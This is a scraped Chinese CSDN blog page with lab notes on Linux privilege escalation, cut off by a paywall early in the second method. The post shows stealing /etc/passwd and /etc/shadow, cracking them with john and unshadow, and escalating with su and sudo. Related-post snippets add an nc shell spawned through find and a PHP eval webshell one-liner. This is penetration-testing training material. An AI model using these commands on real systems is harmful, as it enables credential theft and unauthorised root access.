靶场提权记录

最新推荐文章于 2024-05-31 10:23:56 发布
最新推荐文章于 2024-05-31 10:23:56 发布
阅读量734 收藏 2
点赞数 2
分类专栏: web渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/vhkjhwbs/article/details/102470889
版权

目录

1,下载 靶场的  /etc/passwd 文件 和 /etc/shadow 文件 并破解  

2, 利用 C语言程序溢出漏洞进行提权(前提是 程序中具有 代码执行函数  execve())

3,在本地登录 ssh 实现提权

4,使用 perl命令提权

5,利用 ubuntu 4.4.0内核 溢出 提权

1,下载 靶场的  /etc/passwd 文件 和 /etc/shadow 文件 并破解  

download /etc/passwd
download /etd/shadow

直接用 john 进行暴力破解

john shadow

如果不成功,尝试先把文件转换为john可以识别的文件格式:

unshadow password shadow > cracked

john cracked

获得用户名和密码后,先切换到破解出来的用户,然后再切换到root

su - username    //切换到 得到的用户
Password:123123

sudo su 
Password:123123

2, 利用 C语言程序溢出漏洞进行提权(前提是 程序中具有 代码执行函数  execve())

在使用ssh登录后发现 当前目录中有一个 read_message.c 文件

 

最低0.47元/天 解锁文章
Captain Hammer
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
exploit.tar(DC3靶机所需提权exp-1)
02-20
39772.zip
二号靶场.zip
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
【安全】靶场实战-通过MS16-032提权
03-04 1031
该漏洞影响从Vista到Windows 10的所有Windows版本(包括服务器版本)。Windows 7Windows 10目标系统需要有2个以上的CPU核心。PowerShell v2.0及更高版本必须正在运行。可根据MS16-032(KB3139914)补丁是否安装,来判断当前版本是否可利用。
Vulnhub靶场--AI-Web-1.0提权获取flag
qq_53830529的博客
05-16 681
vulnhub实战靶场中的AI-Web-1.0,使用两种SQL注入上传shell的方法,第一:SQLmap的--os-shell上传shell,第二:通过手动into outfile上传webshell。
vulhub靶场Raven2-MYSQL-UDF提权
最新发布
qq_55349490的博客
05-31 1061
/借助usf.so共享库创建do_system自定义函数//通过do_system函数执行命令。
渗透综合靶场---SqlServer提权
q
12-22 1056
再次查询是否开启3389端口,已开启就使用mstsc连接----exec xp_cmdshell'netstat -ant | find "3389"'查看目标是否开启3389端口----exec xp_cmdshell'netstat -ant | find "3389"'如何找到上传的文件所在目录,使用burp抓包点击文件,然后修改文件名,然后再放包,浏览器因为找不到文件会报错。扫描端口,知道目标ip,扫描目标ip开启了多少端口,(1-65535) 扫描出下面端口。
DC1-9靶机提权总结
问彡心的博客
09-27 1698
使用Drupal的漏洞查看能以root身份执行的文件列表结果显示有find命令通过find与系统命令结合,进入root身份的shell控制台。
制作c语言程序中的漏洞,C语言代码漏洞审计技巧笔记分享
weixin_34170028的博客
05-18 622
c语言代码审计和安全漏洞检查主要容易出现在接口和输入输出位置上。c language code review note1参数和指令检查command: argc argv注意此处为用户外部输入接口,argc和argv两个参数必须严格判断,数据类型,指令格式长度均作安全校验校测。常见的最容易出漏洞的argv[1]参数指针引用。缓冲区溢出,整数溢出,越界等漏洞。environmental var: ...
webgoat靶场需要自行搭建
01-19
WebGoat是一个知名的在线安全靶场,主要用于网络安全教育和练习,尤其在Web应用程序安全领域具有重要地位。这个项目由OWASP(开放网络应用安全项目)维护,旨在帮助开发者、安全人员以及学生理解和学习常见的Web应用...
uploadlabs靶场文件
02-27
这个靶场可以帮助安全研究人员、开发人员以及网络安全爱好者了解和掌握如何预防和修复文件上传漏洞。 【描述】:该靶场是基于PHPStudy的LAMP(Linux、Apache、MySQL、PHP)环境搭建的。"www"目录是Apache服务器默认...
开源靶场zsbdzsbd
04-19
【开源靶场zsbdzsbd】是一个专注于网络安全的开源项目,其主要目的是为网络安全爱好者、学生和专业人士提供一个实践和学习网络安全技能的平台。在这个靶场中,你可以找到各种模拟真实网络环境中存在的漏洞,通过实战...
ros indigo版 虚拟机压缩包 (ubuntu 4.4.0-142-generic 的)
03-26
文件较大,使用云盘。附件中有链接和简单说明。 这是 ubuntu 4.4.0-142-generic 下的ros indigo 版本的压缩包。已经配置完成,可直接使用
Pikachu漏洞靶场 RCE(远程命令执行/代码执行)
柠檬i的博客
04-05 1466
RCE(remote command/code execute)概述 RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口
靶场提权总结
devil8123665的博客
07-21 2472
1 find root权限提权 find / -perm -u=s -type f 2>/dev/null 查看find权限 find /var/www/index.php -exec whoami \; 返回为“root” 设置nc 反弹shell find /var/www/index.php -exec nc -lvp 9999 -e /bin/sh \; 2 exim4 提权 find / -perm -u=s -type f 2>/dev/null 找到root权
Stapler-1靶场详细教学(7种漏洞利用+5种提权
weixin_60374959的博客
12-30 2928
这个靶场令我收获颇深,因为这里利用到的一些手法已经算是实战的技术,同时这里使用了多种方法getshell,getsehll之后又展示了多中方法提权,更多的开拓了我们的思维。我们这里总共用到了7种方法获取权限,5钟方式获取root权限,很大程度开阔了哦我们的思路,如果有别的方法的小伙伴欢迎提出建议哦。
CTF训练笔记(一)- SSH私钥泄露
morrino的博客
01-07 1890
本文作为CTF训练笔记系列的第一章,详细描述了搭建环境时如何配置网络。 总结:细节非常重要,flag往往会藏在意想不到的地方,不要放过任何可疑文件,根据提示逐步挖掘所需信息。[CTF训练笔记系列 - 快速导航](https://blog.csdn.net/morrino/article/details/116036237)
windows常用提权
Longwaer
01-04 906
通过了解掌握windows常用提权的使用方法及原理,更好的使用各类exp进行服务器提权
本地内核提权
一只web狗
07-01 1826
本地内核提权
UDF靶场环境提权实战
蘇同学的安全屋的博客
04-29 2756
UDF靶场环境提权实战 Kali:192.168.221.130 靶机主机:192.168.221.136 1.nmap扫描主机 2.扫描主机的服务:发现有80,135,139,445,1025,3306,3389 3.尝试爆破3306,爆破成功 因开启了远程连接,使用navicat连接成功 4.使用show variables like ‘%priv%’;查询结果为空,可以写入一句话木马 写入一句话木马(需要猜测目录) SELECT “<?php eval($_POST['code']);
docker提权靶场
08-17
Docker提权靶场是用于测试和演练Docker容器安全的环境。它模拟了一些常见的Docker容器提权漏洞,并提供了一系列挑战,供安全研究人员和渗透测试专家进行实践和学习。 在Docker提权靶场中,你可以尝试利用各种漏洞和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值